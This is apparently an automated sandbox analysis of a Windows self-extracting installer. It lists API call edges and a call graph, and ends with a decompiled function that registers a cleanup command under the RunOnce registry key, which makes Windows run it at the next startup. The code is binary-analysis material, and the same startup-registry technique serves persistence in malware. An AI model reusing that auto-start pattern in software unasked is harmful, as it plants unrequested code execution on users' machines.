CreateDirectoryA 2897->2898 2898->2896 2900 e8255b 2899->2900 2901 e82510 2899->2901 2903 e86ce0 4 API calls 2900->2903 2902 e8658a CharPrevA 2901->2902 2904 e82522 WritePrivateProfileStringA _lopen 2902->2904 2905 e82569 2903->2905 2904->2900 2906 e82548 _llseek _lclose 2904->2906 2905->2660 2906->2900 2908 e81b25 2907->2908 3012 e81a84 2908->3012 2910 e81b57 2911 e8658a CharPrevA 2910->2911 2913 e81b8c 2910->2913 2911->2913 2912 e866c8 2 API calls 2914 e81bd1 2912->2914 2913->2912 2915 e81bd9 CompareStringA 2914->2915 2916 e81d73 2914->2916 2915->2916 2917 e81bf7 GetFileAttributesA 2915->2917 2918 e866c8 2 API calls 2916->2918 2919 e81c0d 2917->2919 2920 e81d53 2917->2920 2921 e81d7d 2918->2921 2919->2920 2927 e81a84 2 API calls 2919->2927 2922 e81d64 2920->2922 2923 e81df8 LocalAlloc 2921->2923 2924 e81d81 CompareStringA 2921->2924 2925 e844b9 20 API calls 2922->2925 2923->2922 2926 e81e0b GetFileAttributesA 2923->2926 2924->2923 2931 e81d9b 2924->2931 2928 e81d6c 2925->2928 2939 e81e1d 2926->2939 2946 e81e45 2926->2946 2929 e81c31 2927->2929 2933 e86ce0 4 API calls 2928->2933 2930 e81c50 LocalAlloc 2929->2930 2935 e81a84 2 API calls 2929->2935 2930->2922 2932 e81c67 GetPrivateProfileIntA GetPrivateProfileStringA 2930->2932 2931->2931 2934 e81dbe LocalAlloc 2931->2934 2941 e81cf8 2932->2941 2945 e81cc2 2932->2945 2938 e81ea1 2933->2938 2934->2922 2940 e81de1 2934->2940 2935->2930 2938->2681 2939->2946 2942 e8171e _vsnprintf 2940->2942 2943 e81d09 GetShortPathNameA 2941->2943 2944 e81d23 2941->2944 2942->2945 2943->2944 2947 e8171e _vsnprintf 2944->2947 2945->2928 3018 e82aac 2946->3018 2947->2945 2949 e82256 2948->2949 2950 e8209a 2948->2950 2951 e86ce0 4 API calls 2949->2951 2952 e8171e _vsnprintf 2950->2952 2955 e820dc 2950->2955 2953 e82263 2951->2953 2954 e820af RegQueryValueExA 2952->2954 2953->2681 2954->2950 2954->2955 2956 e820fb GetSystemDirectoryA 2955->2956 2957 e820e4 RegCloseKey 2955->2957 2958 e8658a CharPrevA 2956->2958 2957->2949 2959 e8211b LoadLibraryA 2958->2959 2960 e82179 GetModuleFileNameA 2959->2960 2961 e8212e GetProcAddress FreeLibrary 2959->2961 2962 e821de RegCloseKey 2960->2962 2966 e82177 2960->2966 2961->2960 2963 e8214e GetSystemDirectoryA 2961->2963 2962->2949 2964 e82165 2963->2964 2963->2966 2965 e8658a CharPrevA 2964->2965 2965->2966 2966->2966 2967 e821b7 LocalAlloc 2966->2967 2968 e821ec 2967->2968 2969 e821cd 2967->2969 2971 e8171e _vsnprintf 2968->2971 2970 e844b9 20 API calls 2969->2970 2970->2962 2972 e82218 2971->2972 2972->2972 2973 e82227 RegSetValueExA RegCloseKey LocalFree 2972->2973 2973->2949 2975 e84016 CreateProcessA 2974->2975 2986 e84106 2974->2986 2976 e84041 WaitForSingleObject GetExitCodeProcess 2975->2976 2977 e840c4 2975->2977 2983 e84070 2976->2983 2979 e86285 GetLastError 2977->2979 2978 e86ce0 4 API calls 2980 e84117 2978->2980 2982 e840c9 GetLastError FormatMessageA 2979->2982 2980->2681 2985 e844b9 20 API calls 2982->2985 3045 e8411b 2983->3045 2984 e84096 CloseHandle CloseHandle 2984->2986 2987 e840ba 2984->2987 2985->2986 2986->2978 2987->2986 2989 e864c2 2988->2989 2990 e8658a CharPrevA 2989->2990 2991 e864d8 GetFileAttributesA 2990->2991 2992 e864ea 2991->2992 2993 e86501 LoadLibraryA 2991->2993 2992->2993 2994 e864ee LoadLibraryExA 2992->2994 2995 e86508 2993->2995 2994->2995 2996 e86ce0 4 API calls 2995->2996 2997 e86513 2996->2997 2997->2699 2999 e82289 RegOpenKeyExA 2998->2999 3000 e82381 2998->3000 2999->3000 3001 e822b1 RegQueryValueExA 2999->3001 3002 e86ce0 4 API calls 3000->3002 3003 e82374 RegCloseKey 3001->3003 3004 e822e6 memset GetSystemDirectoryA 3001->3004 3005 e8238c 3002->3005 3003->3000 3006 e8230f 3004->3006 3007 e82321 3004->3007 3005->2677 3008 e8658a CharPrevA 3006->3008 3009 e8171e _vsnprintf 3007->3009 3008->3007 3010 e8233f RegSetValueExA 3009->3010 3010->3003 3013 e81a9a 3012->3013 3015 e81aba 3013->3015 3017 e81aaf 3013->3017 3031 e8667f 3013->3031 3015->2910 3016 e8667f 2 API calls 3016->3017 3017->3015 3017->3016 3019 e82be6 3018->3019 3020 e82ad4 GetModuleFileNameA 3018->3020 3021 e86ce0 4 API calls 3019->3021 3030 e82b02 3020->3030 3022 e82bf5 3021->3022 3022->2928 3023 e82af1 IsDBCSLeadByte 3023->3030 3024 e82bca CharNextA 3027 e82bd3 CharNextA 3024->3027 3025 e82b11 CharNextA CharUpperA 3026 e82b8d CharUpperA 3025->3026 3025->3030 3026->3030 3027->3030 3029 e82b43 CharPrevA 3029->3030 3030->3019 3030->3023 3030->3024 3030->3025 3030->3027 3030->3029 3036 e865e8 3030->3036 3032 e86689 3031->3032 3033 e866a5 3032->3033 3034 e86648 IsDBCSLeadByte 3032->3034 3035 e86697 CharNextA 3032->3035 3033->3013 3034->3032 3035->3032 3037 e865f4 3036->3037 3037->3037 3038 e865fb CharPrevA 3037->3038 3039 e86611 CharPrevA 3038->3039 3040 e8660b 3039->3040 3041 e8661e 3039->3041 3040->3039 3040->3041 3042 e8663d 3041->3042 3043 e86634 CharNextA 3041->3043 3044 e86627 CharPrevA 3041->3044 3042->3030 3043->3042 3044->3042 3044->3043 3046 e8412a 3045->3046 3047 e84132 3045->3047 3046->2984 3049 e81ea7 3047->3049 3050 e81ed3 3049->3050 3051 e81eba 3049->3051 3050->3046 3052 e8256d 15 API calls 3051->3052 3052->3050 3054 e81ff0 RegOpenKeyExA 3053->3054 3055 e82026 3053->3055 3054->3055 3056 e8200f RegDeleteValueA RegCloseKey 3054->3056 3055->2323 3056->3055 3057 e84ca0 GlobalAlloc 3124 e819e0 3125 e81a03 3124->3125 3126 e81a24 GetDesktopWindow 3124->3126 3127 e81a20 3125->3127 3130 e81a16 EndDialog 3125->3130 3133 e843d0 6 API calls 3126->3133 3131 e86ce0 4 API calls 3127->3131 3130->3127 3132 e81a7e 3131->3132 3134 e84463 SetWindowPos 3133->3134 3136 e86ce0 4 API calls 3134->3136 3137 e81a33 LoadStringA SetDlgItemTextA MessageBeep 3136->3137 3137->3127 3138 e86a20 __getmainargs 3139 e86ef0 3140 e86f2d 3139->3140 3142 e86f02 3139->3142 3141 e86f27 ?terminate@ 3141->3140 3142->3140 3142->3141 3143 e834f0 3144 e83504 3143->3144 3145 e835b8 3143->3145 3144->3145 3146 e8351b 3144->3146 3147 e835be GetDesktopWindow 3144->3147 3148 e83526 3145->3148 3149 e83671 EndDialog 3145->3149 3151 e8354f 3146->3151 3152 e8351f 3146->3152 3150 e843d0 11 API calls 3147->3150 3149->3148 3153 e835d6 3150->3153 3151->3148 3155 e83559 ResetEvent 3151->3155 3152->3148 3154 e8352d TerminateThread EndDialog 3152->3154 3156 e8361d SetWindowTextA CreateThread 3153->3156 3157 e835e0 GetDlgItem SendMessageA GetDlgItem SendMessageA 3153->3157 3154->3148 3158 e844b9 20 API calls 3155->3158 3156->3148 3159 e83646 3156->3159 3157->3156 3160 e83581 3158->3160 3161 e844b9 20 API calls 3159->3161 3162 e8359b SetEvent 3160->3162 3163 e8358a SetEvent 3160->3163 3161->3145 3164 e83680 4 API calls 3162->3164 3163->3148 3164->3145 3165 e869b0 3166 e869b5 3165->3166 3174 e86fbe GetModuleHandleW 3166->3174 3168 e869c1 __set_app_type __p__fmode __p__commode 3169 e869f9 3168->3169 3170 e86a0e 3169->3170 3171 e86a02 __setusermatherr 3169->3171 3176 e871ef _controlfp 3170->3176 3171->3170 3173 e86a13 3175 e86fcf 3174->3175 3175->3168 3176->3173 3177 e87270 _except_handler4_common 3058 e84cc0 GlobalFree 3059 e86f40 SetUnhandledExceptionFilter 3178 e84bc0 3179 e84c05 3178->3179 3180 e84bd7 3178->3180 3179->3180 3181 e84c1b SetFilePointer 3179->3181 3181->3180 3182 e830c0 3183 e830de CallWindowProcA 3182->3183 3184 e830ce 3182->3184 3185 e830da 3183->3185 3184->3183 3184->3185 3186 e863c0 3187 e86407 3186->3187 3188 e8658a CharPrevA 3187->3188 3189 e86415 CreateFileA 3188->3189 3190 e86448 WriteFile 3189->3190 3191 e8643a 3189->3191 3192 e86465 CloseHandle 3190->3192 3193 e86ce0 4 API calls 3191->3193 3192->3191 3195 e8648f 3193->3195 3196 e83100 3197 e831b0 3196->3197 3200 e83111 3196->3200 3198 e831b9 SendDlgItemMessageA 3197->3198 3199 e83141 3197->3199 3198->3199 3201 e83149 GetDesktopWindow 3200->3201 3202 e8311d 3200->3202 3204 e843d0 11 API calls 3201->3204 3202->3199 3203 e83138 EndDialog 3202->3203 3203->3199 3205 e8315d 6 API calls 3204->3205 3205->3199 3206 e84200 3207 e8420b SendMessageA 3206->3207 3208 e8421e 3206->3208 3207->3208 3209 e86c03 3210 e86c1e 3209->3210 3211 e86c17 _exit 3209->3211 3212 e86c27 _cexit 3210->3212 3213 e86c32 3210->3213 3211->3210 3212->3213 3060 e84cd0 3061 e84d0b 3060->3061 3062 e84cf4 3060->3062 3063 e84d02 3061->3063 3066 e84dcb 3061->3066 3069 e84d25 3061->3069 3062->3063 3064 e84b60 FindCloseChangeNotification 3062->3064 3065 e86ce0 4 API calls 3063->3065 3064->3063 3068 e84e95 3065->3068 3067 e84dd4 SetDlgItemTextA 3066->3067 3070 e84de3 3066->3070 3067->3070 3069->3063 3083 e84c37 3069->3083 3070->3063 3088 e8476d 3070->3088 3074 e84e38 3074->3063 3076 e84980 25 API calls 3074->3076 3075 e84b60 FindCloseChangeNotification 3078 e84d99 SetFileAttributesA 3075->3078 3077 e84e56 3076->3077 3077->3063 3079 e84e64 3077->3079 3078->3063 3097 e847e0 LocalAlloc 3079->3097 3082 e84e6f 3082->3063 3084 e84c4c DosDateTimeToFileTime 3083->3084 3085 e84c88 3083->3085 3084->3085 3086 e84c5e LocalFileTimeToFileTime 3084->3086 3085->3063 3085->3075 3086->3085 3087 e84c70 SetFileTime 3086->3087 3087->3085 3106 e866ae GetFileAttributesA 3088->3106 3090 e8477b 3090->3074 3091 e847cc SetFileAttributesA 3093 e847db 3091->3093 3093->3074 3094 e86517 24 API calls 3095 e847b1 3094->3095 3095->3091 3095->3093 3096 e847c2 3095->3096 3096->3091 3098 e847f6 3097->3098 3100 e8480f 3097->3100 3099 e844b9 20 API calls 3098->3099 3105 e8480b 3099->3105 3100->3100 3101 e8481b LocalAlloc 3100->3101 3102 e84831 3101->3102 3101->3105 3103 e844b9 20 API calls 3102->3103 3104 e84846 LocalFree 3103->3104 3104->3105 3105->3082 3107 e84777 3106->3107 3107->3090 3107->3091 3107->3094 3108 e84ad0 3116 e83680 3108->3116 3111 e84ae9 3112 e84aee WriteFile 3113 e84b0f 3112->3113 3114 e84b14 3112->3114 3114->3113 3115 e84b3b SendDlgItemMessageA 3114->3115 3115->3113 3117 e83691 MsgWaitForMultipleObjects 3116->3117 3118 e836e8 3117->3118 3119 e836a9 PeekMessageA 3117->3119 3118->3111 3118->3112 3119->3117 3120 e836bc 3119->3120 3120->3117 3120->3118 3121 e836c7 DispatchMessageA 3120->3121 3122 e836d1 PeekMessageA 3120->3122 3121->3122 3122->3120 3214 e84a50 3215 e84a9f ReadFile 3214->3215 3216 e84a66 3214->3216 3217 e84abb 3215->3217 3216->3217 3218 e84a82 memcpy 3216->3218 3218->3217 3219 e83450 3220 e8345e 3219->3220 3221 e834d3 EndDialog 3219->3221 3223 e8349a GetDesktopWindow 3220->3223 3227 e83465 3220->3227 3222 e8346a 3221->3222 3224 e843d0 11 API calls 3223->3224 3225 e834ac SetWindowTextA SetDlgItemTextA SetForegroundWindow 3224->3225 3225->3222 3226 e8348c EndDialog 3226->3222 3227->3222 3227->3226 3228 e83210 3229 e83227 3228->3229 3254 e8328e EndDialog 3228->3254 3230 e833e2 GetDesktopWindow 3229->3230 3231 e83235 3229->3231 3233 e843d0 11 API calls 3230->3233 3235 e8324c 3231->3235 3236 e832dd GetDlgItemTextA 3231->3236 3246 e83239 3231->3246 3234 e833f1 SetWindowTextA SendDlgItemMessageA 3233->3234 3237 e8341f GetDlgItem EnableWindow 3234->3237 3234->3246 3239 e83251 3235->3239 3240 e832c5 EndDialog 3235->3240 3238 e83366 3236->3238 3247 e832fc 3236->3247 3237->3246 3242 e844b9 20 API calls 3238->3242 3241 e8325c LoadStringA 3239->3241 3239->3246 3240->3246 3243 e8327b 3241->3243 3244 e83294 3241->3244 3242->3246 3250 e844b9 20 API calls 3243->3250 3266 e84224 LoadLibraryA 3244->3266 3247->3238 3249 e83331 GetFileAttributesA 3247->3249 3252 e8337c 3249->3252 3253 e8333f 3249->3253 3250->3254 3251 e832a5 SetDlgItemTextA 3251->3243 3251->3246 3255 e8658a CharPrevA 3252->3255 3256 e844b9 20 API calls 3253->3256 3254->3246 3258 e8338d 3255->3258 3257 e83351 3256->3257 3257->3246 3259 e8335a CreateDirectoryA 3257->3259 3260 e858c8 27 API calls 3258->3260 3259->3238 3259->3252 3261 e83394 3260->3261 3261->3238 3262 e833a4 3261->3262 3263 e833c7 EndDialog 3262->3263 3264 e8597d 34 API calls 3262->3264 3263->3246 3265 e833c3 3264->3265 3265->3246 3265->3263 3267 e843b2 3266->3267 3268 e84246 GetProcAddress 3266->3268 3271 e844b9 20 API calls 3267->3271 3269 e8425d GetProcAddress 3268->3269 3270 e843a4 FreeLibrary 3268->3270 3269->3270 3272 e84274 GetProcAddress 3269->3272 3270->3267 3274 e8329d 3271->3274 3272->3270 3273 e8428b 3272->3273 3275 e84295 GetTempPathA 3273->3275 3280 e842e1 3273->3280 3274->3246 3274->3251 3276 e842ad 3275->3276 3276->3276 3277 e842b4 CharPrevA 3276->3277 3278 e842d0 CharPrevA 3277->3278 3277->3280 3278->3280 3279 e84390 FreeLibrary 3279->3274 3280->3279

                                                                                                                                                                                                        Callgraph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        • Opacity -> Relevance
                                                                                                                                                                                                        • Disassembly available
                                                                                                                                                                                                        callgraph 0 Function_00E81AE8 12 Function_00E86CE0 0->12 26 Function_00E866C8 0->26 38 Function_00E82AAC 0->38 49 Function_00E844B9 0->49 52 Function_00E816B3 0->52 55 Function_00E8658A 0->55 58 Function_00E81680 0->58 62 Function_00E81781 0->62 63 Function_00E81A84 0->63 116 Function_00E8171E 0->116 1 Function_00E828E8 54 Function_00E82A89 1->54 87 Function_00E82773 1->87 2 Function_00E865E8 3 Function_00E870EB 4 Function_00E836EE 4->1 4->12 28 Function_00E867C9 4->28 4->49 4->54 117 Function_00E8681F 4->117 5 Function_00E817EE 5->12 6 Function_00E83FEF 6->12 6->49 64 Function_00E86285 6->64 113 Function_00E8411B 6->113 7 Function_00E871EF 8 Function_00E86BEF 9 Function_00E84FE0 19 Function_00E84EFD 9->19 9->49 57 Function_00E8468F 9->57 10 Function_00E847E0 10->49 10->58 11 Function_00E831E0 23 Function_00E86CF0 12->23 13 Function_00E824E0 13->12 13->55 14 Function_00E819E0 14->12 35 Function_00E843D0 14->35 15 Function_00E81FE1 16 Function_00E851E5 16->49 16->57 16->64 17 Function_00E866F9 18 Function_00E82BFB 37 Function_00E82CAA 18->37 53 Function_00E852B6 18->53 69 Function_00E81F90 18->69 114 Function_00E82F1D 18->114 19->12 59 Function_00E84980 19->59 76 Function_00E84B60 19->76 20 Function_00E870FE 21 Function_00E86EF0 22 Function_00E834F0 22->35 22->49 60 Function_00E83680 22->60 24 Function_00E872F1 25 Function_00E817C8 88 Function_00E86648 26->88 27 Function_00E858C8 27->49 27->55 27->58 27->64 70 Function_00E86793 28->70 29 Function_00E84CC0 30 Function_00E84BC0 31 Function_00E830C0 32 Function_00E863C0 32->12 32->55 32->62 33 Function_00E84CD0 33->10 33->12 33->59 66 Function_00E84E99 33->66 74 Function_00E8476D 33->74 33->76 105 Function_00E84C37 33->105 111 Function_00E84702 33->111 34 Function_00E84AD0 34->60 35->12 36 Function_00E872D2 37->4 37->12 46 Function_00E818A3 37->46 37->49 37->57 67 Function_00E85C9E 37->67 68 Function_00E82390 37->68 121 Function_00E86517 37->121 38->2 38->12 38->25 38->58 39 Function_00E866AE 40 Function_00E855A0 40->12 40->49 40->55 40->57 40->62 40->64 80 Function_00E85467 40->80 83 Function_00E8597D 40->83 93 Function_00E86952 40->93 104 Function_00E82630 40->104 40->121 41 Function_00E84CA0 42 Function_00E853A1 42->12 42->55 42->58 42->116 43 Function_00E86FA1 44 Function_00E83BA2 44->0 44->6 44->12 44->49 44->57 44->62 44->64 71 Function_00E86495 44->71 81 Function_00E82267 44->81 96 Function_00E8202A 44->96 45 Function_00E872A2 46->5 46->12 47 Function_00E86FA5 89 Function_00E8724D 47->89 48 Function_00E81EA7 73 Function_00E8256D 48->73 49->12 49->28 49->58 49->116 49->117 50 Function_00E86FBE 94 Function_00E86F54 50->94 51 Function_00E869B0 51->7 51->50 86 Function_00E86C70 51->86 110 Function_00E87000 51->110 52->62 53->2 53->12 53->15 53->62 53->68 55->52 56 Function_00E8268B 56->12 56->49 56->116 58->62 59->49 82 Function_00E8487A 59->82 61 Function_00E86380 84 Function_00E8667F 63->84 65 Function_00E86298 65->12 65->116 66->58 67->11 67->12 67->26 67->49 67->55 67->58 67->84 97 Function_00E86E2A 67->97 120 Function_00E85C17 67->120 68->12 68->52 68->55 68->58 68->68 69->12 69->48 69->49 71->12 71->55 71->62 72 Function_00E84169 72->49 72->57 73->13 74->39 74->121 75 Function_00E87060 98 Function_00E87120 75->98 118 Function_00E87010 75->118 77 Function_00E86760 78 Function_00E86A60 78->18 78->75 78->89 95 Function_00E87155 78->95 103 Function_00E86C3F 78->103 106 Function_00E87208 78->106 79 Function_00E85164 79->49 79->57 79->65 80->12 80->27 80->42 80->55 80->58 80->62 80->64 80->83 81->12 81->55 81->116 107 Function_00E8490C 82->107 83->12 83->49 83->56 83->64 84->88 85 Function_00E87270 87->12 87->55 87->58 87->62 90 Function_00E86F40 91 Function_00E84A50 92 Function_00E83450 92->35 94->89 94->106 96->12 96->49 96->55 96->116 97->23 99 Function_00E86A20 100 Function_00E84224 100->49 100->58 101 Function_00E83B26 101->9 101->65 101->121 102 Function_00E83A3F 102->49 102->57 102->64 102->121 104->12 104->49 108 Function_00E83100 108->35 109 Function_00E84200 111->52 111->58 112 Function_00E86C03 112->89 113->48 114->12 114->16 114->40 114->44 114->49 114->55 114->64 114->72 114->73 114->79 114->101 114->102 115 Function_00E8621E 114->115 115->12 115->49 115->64 115->83 117->12 117->17 119 Function_00E83210 119->27 119->35 119->49 119->55 119->83 119->100 121->49

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        C-Code - Quality: 93%
                                                                                                                                                                                                        			E00E8202A(struct HINSTANCE__* __edx) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				char _v528;
                                                                                                                                                                                                        				void* _v532;
                                                                                                                                                                                                        				int _v536;
                                                                                                                                                                                                        				int _v540;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t28;
                                                                                                                                                                                                        				long _t36;
                                                                                                                                                                                                        				long _t41;
                                                                                                                                                                                                        				struct HINSTANCE__* _t46;
                                                                                                                                                                                                        				intOrPtr _t49;
                                                                                                                                                                                                        				intOrPtr _t50;
                                                                                                                                                                                                        				CHAR* _t54;
                                                                                                                                                                                                        				void _t56;
                                                                                                                                                                                                        				signed int _t66;
                                                                                                                                                                                                        				intOrPtr* _t72;
                                                                                                                                                                                                        				void* _t73;
                                                                                                                                                                                                        				void* _t75;
                                                                                                                                                                                                        				void* _t80;
                                                                                                                                                                                                        				intOrPtr* _t81;
                                                                                                                                                                                                        				void* _t86;
                                                                                                                                                                                                        				void* _t87;
                                                                                                                                                                                                        				void* _t90;
                                                                                                                                                                                                        				_Unknown_base(*)()* _t91;
                                                                                                                                                                                                        				signed int _t93;
                                                                                                                                                                                                        				void* _t94;
                                                                                                                                                                                                        				void* _t95;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t79 = __edx;
                                                                                                                                                                                                        				_t28 =  *0xe88004; // 0x18391fe1
                                                                                                                                                                                                        				_v8 = _t28 ^ _t93;
                                                                                                                                                                                                        				_t84 = 0x104;
                                                                                                                                                                                                        				memset( &_v268, 0, 0x104);
                                                                                                                                                                                                        				memset( &_v528, 0, 0x104);
                                                                                                                                                                                                        				_t95 = _t94 + 0x18;
                                                                                                                                                                                                        				_t66 = 0;
                                                                                                                                                                                                        				_t36 = RegCreateKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0, 0, 0x2001f, 0,  &_v532,  &_v536); // executed
                                                                                                                                                                                                        				if(_t36 != 0) {
                                                                                                                                                                                                        					L24:
                                                                                                                                                                                                        					return E00E86CE0(_t36, _t66, _v8 ^ _t93, _t79, _t84, _t86);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_push(_t86);
                                                                                                                                                                                                        				_t87 = 0;
                                                                                                                                                                                                        				while(1) {
                                                                                                                                                                                                        					E00E8171E("wextract_cleanup0", 0x50, "wextract_cleanup%d", _t87);
                                                                                                                                                                                                        					_t95 = _t95 + 0x10;
                                                                                                                                                                                                        					_t41 = RegQueryValueExA(_v532, "wextract_cleanup0", 0, 0, 0,  &_v540); // executed
                                                                                                                                                                                                        					if(_t41 != 0) {
                                                                                                                                                                                                        						break;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t87 = _t87 + 1;
                                                                                                                                                                                                        					if(_t87 < 0xc8) {
                                                                                                                                                                                                        						continue;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					break;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				if(_t87 != 0xc8) {
                                                                                                                                                                                                        					GetSystemDirectoryA( &_v528, _t84);
                                                                                                                                                                                                        					_t79 = _t84;
                                                                                                                                                                                                        					E00E8658A( &_v528, _t84, "advpack.dll");
                                                                                                                                                                                                        					_t46 = LoadLibraryA( &_v528); // executed
                                                                                                                                                                                                        					_t84 = _t46;
                                                                                                                                                                                                        					if(_t84 == 0) {
                                                                                                                                                                                                        						L10:
                                                                                                                                                                                                        						if(GetModuleFileNameA( *0xe89a3c,  &_v268, 0x104) == 0) {
                                                                                                                                                                                                        							L17:
                                                                                                                                                                                                        							_t36 = RegCloseKey(_v532);
                                                                                                                                                                                                        							L23:
                                                                                                                                                                                                        							_pop(_t86);
                                                                                                                                                                                                        							goto L24;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						L11:
                                                                                                                                                                                                        						_t72 =  &_v268;
                                                                                                                                                                                                        						_t80 = _t72 + 1;
                                                                                                                                                                                                        						do {
                                                                                                                                                                                                        							_t49 =  *_t72;
                                                                                                                                                                                                        							_t72 = _t72 + 1;
                                                                                                                                                                                                        						} while (_t49 != 0);
                                                                                                                                                                                                        						_t73 = _t72 - _t80;
                                                                                                                                                                                                        						_t81 = 0xe891e4;
                                                                                                                                                                                                        						do {
                                                                                                                                                                                                        							_t50 =  *_t81;
                                                                                                                                                                                                        							_t81 = _t81 + 1;
                                                                                                                                                                                                        						} while (_t50 != 0);
                                                                                                                                                                                                        						_t84 = _t73 + 0x50 + _t81 - 0xe891e5;
                                                                                                                                                                                                        						_t90 = LocalAlloc(0x40, _t73 + 0x50 + _t81 - 0xe891e5);
                                                                                                                                                                                                        						if(_t90 != 0) {
                                                                                                                                                                                                        							 *0xe88580 = _t66 ^ 0x00000001;
                                                                                                                                                                                                        							_t54 = "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"";
                                                                                                                                                                                                        							if(_t66 == 0) {
                                                                                                                                                                                                        								_t54 = "%s /D:%s";
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_push("C:\Users\jones\AppData\Local\Temp\IXP000.TMP\");
                                                                                                                                                                                                        							E00E8171E(_t90, _t84, _t54,  &_v268);
                                                                                                                                                                                                        							_t75 = _t90;
                                                                                                                                                                                                        							_t23 = _t75 + 1; // 0x1
                                                                                                                                                                                                        							_t79 = _t23;
                                                                                                                                                                                                        							do {
                                                                                                                                                                                                        								_t56 =  *_t75;
                                                                                                                                                                                                        								_t75 = _t75 + 1;
                                                                                                                                                                                                        							} while (_t56 != 0);
                                                                                                                                                                                                        							_t24 = _t75 - _t79 + 1; // 0x2
                                                                                                                                                                                                        							RegSetValueExA(_v532, "wextract_cleanup0", 0, 1, _t90, _t24); // executed
                                                                                                                                                                                                        							RegCloseKey(_v532); // executed
                                                                                                                                                                                                        							_t36 = LocalFree(_t90);
                                                                                                                                                                                                        							goto L23;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t79 = 0x4b5;
                                                                                                                                                                                                        						E00E844B9(0, 0x4b5, _t51, _t51, 0x10, _t51);
                                                                                                                                                                                                        						goto L17;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t91 = GetProcAddress(_t84, "DelNodeRunDLL32");
                                                                                                                                                                                                        					_t66 = 0 | _t91 != 0x00000000;
                                                                                                                                                                                                        					FreeLibrary(_t84); // executed
                                                                                                                                                                                                        					if(_t91 == 0) {
                                                                                                                                                                                                        						goto L10;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                        						E00E8658A( &_v268, 0x104, 0xe81140);
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					goto L11;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t36 = RegCloseKey(_v532);
                                                                                                                                                                                                        				 *0xe88530 = _t66;
                                                                                                                                                                                                        				goto L23;
                                                                                                                                                                                                        			}

































                                                                                                                                                                                                        0x00e8202a
                                                                                                                                                                                                        0x00e82035
                                                                                                                                                                                                        0x00e8203c
                                                                                                                                                                                                        0x00e82041
                                                                                                                                                                                                        0x00e82050
                                                                                                                                                                                                        0x00e8205f
                                                                                                                                                                                                        0x00e82064
                                                                                                                                                                                                        0x00e8206f
                                                                                                                                                                                                        0x00e8208c
                                                                                                                                                                                                        0x00e82094
                                                                                                                                                                                                        0x00e82257
                                                                                                                                                                                                        0x00e82266
                                                                                                                                                                                                        0x00e82266
                                                                                                                                                                                                        0x00e8209a
                                                                                                                                                                                                        0x00e8209b
                                                                                                                                                                                                        0x00e8209d
                                                                                                                                                                                                        0x00e820aa
                                                                                                                                                                                                        0x00e820af
                                                                                                                                                                                                        0x00e820c9
                                                                                                                                                                                                        0x00e820d1
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e820d3
                                                                                                                                                                                                        0x00e820da
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e820da
                                                                                                                                                                                                        0x00e820e2
                                                                                                                                                                                                        0x00e82103
                                                                                                                                                                                                        0x00e8210e
                                                                                                                                                                                                        0x00e82116
                                                                                                                                                                                                        0x00e82122
                                                                                                                                                                                                        0x00e82128
                                                                                                                                                                                                        0x00e8212c
                                                                                                                                                                                                        0x00e82179
                                                                                                                                                                                                        0x00e82194
                                                                                                                                                                                                        0x00e821de
                                                                                                                                                                                                        0x00e821e4
                                                                                                                                                                                                        0x00e82256
                                                                                                                                                                                                        0x00e82256
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e82256
                                                                                                                                                                                                        0x00e82196
                                                                                                                                                                                                        0x00e82196
                                                                                                                                                                                                        0x00e8219c
                                                                                                                                                                                                        0x00e8219f
                                                                                                                                                                                                        0x00e8219f
                                                                                                                                                                                                        0x00e821a1
                                                                                                                                                                                                        0x00e821a2
                                                                                                                                                                                                        0x00e821a6
                                                                                                                                                                                                        0x00e821a8
                                                                                                                                                                                                        0x00e821b0
                                                                                                                                                                                                        0x00e821b0
                                                                                                                                                                                                        0x00e821b2
                                                                                                                                                                                                        0x00e821b3
                                                                                                                                                                                                        0x00e821bc
                                                                                                                                                                                                        0x00e821c7
                                                                                                                                                                                                        0x00e821cb
                                                                                                                                                                                                        0x00e821f1
                                                                                                                                                                                                        0x00e821f6
                                                                                                                                                                                                        0x00e821fd
                                                                                                                                                                                                        0x00e821ff
                                                                                                                                                                                                        0x00e821ff
                                                                                                                                                                                                        0x00e82204
                                                                                                                                                                                                        0x00e82213
                                                                                                                                                                                                        0x00e82218
                                                                                                                                                                                                        0x00e8221d
                                                                                                                                                                                                        0x00e8221d
                                                                                                                                                                                                        0x00e82220
                                                                                                                                                                                                        0x00e82220
                                                                                                                                                                                                        0x00e82222
                                                                                                                                                                                                        0x00e82223
                                                                                                                                                                                                        0x00e82229
                                                                                                                                                                                                        0x00e8223d
                                                                                                                                                                                                        0x00e82249
                                                                                                                                                                                                        0x00e82250
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e82250
                                                                                                                                                                                                        0x00e821d2
                                                                                                                                                                                                        0x00e821d9
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e821d9
                                                                                                                                                                                                        0x00e8213a
                                                                                                                                                                                                        0x00e82141
                                                                                                                                                                                                        0x00e82144
                                                                                                                                                                                                        0x00e8214c
                                                                                                                                                                                                        0x00000000
